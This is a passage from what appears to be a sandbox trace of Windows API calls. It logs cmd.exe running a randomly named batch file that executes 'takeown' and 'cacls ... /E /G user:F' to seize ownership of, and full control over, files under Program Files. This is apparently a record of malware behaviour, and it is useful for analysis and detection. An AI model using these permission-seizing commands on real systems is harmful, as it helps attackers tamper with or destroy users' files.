_wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0290.649] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0290.649] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0290.649] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0290.651] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0290.651] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0290.651] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0290.651] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0290.651] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0290.651] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0290.651] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0290.651] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0290.651] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0290.651] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0290.651] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0290.651] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0290.651] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0290.651] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0290.651] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0290.652] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0290.652] SetErrorMode (uMode=0x0) returned 0x0 [0290.652] SetErrorMode (uMode=0x1) returned 0x0 [0290.652] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xcbc500, lpFilePart=0x9deaac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x9deaac*="Desktop") returned 0x1d [0290.652] SetErrorMode (uMode=0x0) returned 0x1 [0290.652] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0290.652] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0290.652] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0290.652] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0290.652] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x9de838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9de838) returned 0xffffffff [0290.652] GetLastError () returned 0x2 [0290.652] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0290.653] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x9de838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9de838) returned 0xffffffff [0290.653] GetLastError () returned 0x2 [0290.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0290.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x9de838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9de838) returned 0xcbc898 [0290.653] FindClose (in: hFindFile=0xcbc898 | out: hFindFile=0xcbc898) returned 1 [0290.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x9de838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9de838) returned 0xffffffff [0290.653] GetLastError () returned 0x2 [0290.653] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x9de838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9de838) returned 0xcbc898 [0290.653] FindClose (in: hFindFile=0xcbc898 | out: hFindFile=0xcbc898) returned 1 [0290.653] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0290.653] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0290.653] GetConsoleTitleW (in: lpConsoleTitle=0x9ded2c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0290.658] InitializeProcThreadAttributeList (in: lpAttributeList=0x9dec58, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x9dec3c | out: lpAttributeList=0x9dec58, lpSize=0x9dec3c) returned 1 [0290.658] UpdateProcThreadAttribute (in: lpAttributeList=0x9dec58, dwFlags=0x0, Attribute=0x60001, lpValue=0x9dec44, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x9dec58, lpPreviousValue=0x0) returned 1 [0290.658] GetStartupInfoW (in: lpStartupInfo=0x9dec90 | out: lpStartupInfo=0x9dec90*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0290.658] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0290.658] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0290.659] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0290.659] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0290.660] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x9debe0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x9dec2c | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0x9dec2c*(hProcess=0xb8, hThread=0xb0, dwProcessId=0xfbc, dwThreadId=0x70c)) returned 1 [0290.667] CloseHandle (hObject=0xb0) returned 1 [0290.667] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0290.667] GetEnvironmentStringsW () returned 0xcb9df0* [0290.667] FreeEnvironmentStringsA (penv="=") returned 1 [0290.667] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0291.799] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0x9debc4 | out: lpExitCode=0x9debc4*=0x0) returned 1 [0291.799] CloseHandle (hObject=0xb8) returned 1 [0291.799] _vsnwprintf (in: _Buffer=0x9decac, _BufferCount=0x13, _Format="%08X", _ArgList=0x9debcc | out: _Buffer="00000000") returned 8 [0291.799] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0291.799] GetEnvironmentStringsW () returned 0xcbe348* [0291.800] FreeEnvironmentStringsA (penv="=") returned 1 [0291.800] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0291.800] GetEnvironmentStringsW () returned 0xcbe348* [0291.800] FreeEnvironmentStringsA (penv="=") returned 1 [0291.800] DeleteProcThreadAttributeList (in: lpAttributeList=0x9dec58 | out: lpAttributeList=0x9dec58) [0291.800] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.800] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0291.868] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.868] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0291.868] _get_osfhandle (_FileHandle=0) returned 0x38 [0291.868] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0291.868] SetConsoleInputExeNameW () returned 0x1 [0291.868] GetConsoleOutputCP () returned 0x1b5 [0291.868] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0291.868] SetThreadUILanguage (LangId=0x0) returned 0x409 [0291.869] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9df3ec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0291.869] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0291.869] _get_osfhandle (_FileHandle=3) returned 0xb8 [0291.869] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0291.869] _get_osfhandle (_FileHandle=3) returned 0xb8 [0291.869] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0291.870] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9df3bc, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x9df3bc*=0xc2, lpOverlapped=0x0) returned 1 [0291.870] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0291.870] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0291.870] _get_osfhandle (_FileHandle=3) returned 0xb8 [0291.870] GetFileType (hFile=0xb8) returned 0x1 [0291.870] _get_osfhandle (_FileHandle=3) returned 0xb8 [0291.870] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0291.870] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0291.870] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0291.870] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0291.870] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0291.870] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0291.870] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0291.870] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0291.871] _tell (_FileHandle=3) returned 47 [0291.871] _close (_FileHandle=3) returned 0 [0291.871] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x9df180 | out: _Buffer="\r\n") returned 2 [0291.871] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.871] GetFileType (hFile=0x3c) returned 0x2 [0291.871] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0291.871] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df158 | out: lpMode=0x9df158) returned 1 [0291.872] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.872] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x9df170, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df170*=0x2) returned 1 [0291.872] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0291.872] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0291.872] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x9df17c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0291.872] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x9df17c | out: _Buffer=">") returned 1 [0291.872] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.872] GetFileType (hFile=0x3c) returned 0x2 [0291.872] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0291.872] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df15c | out: lpMode=0x9df15c) returned 1 [0291.872] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.872] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x9df174, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x9df174*=0x1e) returned 1 [0291.873] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.873] GetFileType (hFile=0x3c) returned 0x2 [0291.873] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0291.873] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3fc | out: lpMode=0x9df3fc) returned 1 [0291.873] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.873] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xcb75f0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x9df414, lpReserved=0x0 | out: lpBuffer=0xcb75f0*, lpNumberOfCharsWritten=0x9df414*=0x7) returned 1 [0291.873] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x9df41c | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\" ") returned 58 [0291.873] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.873] GetFileType (hFile=0x3c) returned 0x2 [0291.873] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0291.873] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3f4 | out: lpMode=0x9df3f4) returned 1 [0291.873] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.873] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x9df40c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df40c*=0x3a) returned 1 [0291.874] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x9df430 | out: _Buffer="\r\n") returned 2 [0291.874] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.874] GetFileType (hFile=0x3c) returned 0x2 [0291.874] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0291.874] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df408 | out: lpMode=0x9df408) returned 1 [0291.874] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.874] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x9df420, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df420*=0x2) returned 1 [0291.874] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0291.874] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0291.874] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0291.874] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0291.874] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0291.874] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0291.874] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0291.874] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0291.874] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0291.874] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0291.874] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0291.874] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0291.874] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0291.875] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0291.875] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0291.875] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0291.875] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0291.875] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0291.875] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0291.875] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0291.875] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0291.875] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0291.875] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0291.875] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0291.875] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0291.875] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0291.875] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0291.875] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0291.875] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0291.875] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0291.875] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0291.875] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0291.875] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0291.875] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0291.875] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0291.875] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0291.875] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0291.875] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0291.875] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0291.875] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0291.875] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0291.875] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0291.875] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0291.875] SetErrorMode (uMode=0x0) returned 0x0 [0291.875] SetErrorMode (uMode=0x1) returned 0x0 [0291.875] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xcbf930, lpFilePart=0x9df1cc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x9df1cc*="Desktop") returned 0x1d [0291.875] SetErrorMode (uMode=0x0) returned 0x1 [0291.875] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0291.875] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0291.876] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0291.876] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0291.876] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x9def58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9def58) returned 0xffffffff [0291.876] GetLastError () returned 0x2 [0291.876] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0291.876] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x9def58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9def58) returned 0xffffffff [0291.876] GetLastError () returned 0x2 [0291.876] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0291.876] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x9def58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9def58) returned 0xcbcbb0 [0291.876] FindClose (in: hFindFile=0xcbcbb0 | out: hFindFile=0xcbcbb0) returned 1 [0291.876] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x9def58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9def58) returned 0xffffffff [0291.876] GetLastError () returned 0x2 [0291.876] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x9def58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9def58) returned 0xcbcbb0 [0291.877] FindClose (in: hFindFile=0xcbcbb0 | out: hFindFile=0xcbcbb0) returned 1 [0291.877] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0291.877] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0291.877] GetConsoleTitleW (in: lpConsoleTitle=0x9defa0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0291.877] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0291.877] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0291.877] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0291.877] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0291.877] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0291.877] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0291.877] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0291.877] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0291.877] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0291.877] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0291.877] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0291.877] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0291.877] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0291.877] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0291.877] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0291.877] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0291.877] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0291.877] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0291.877] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0291.877] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0291.877] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0291.877] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0291.877] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0291.877] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0291.877] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0291.877] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0291.877] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0291.877] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0291.877] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0291.878] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0291.878] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0291.878] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0291.878] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0291.878] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0291.878] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0291.878] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0291.878] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0291.878] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0291.878] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0291.878] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0291.878] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0291.878] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0291.878] _wcsicmp 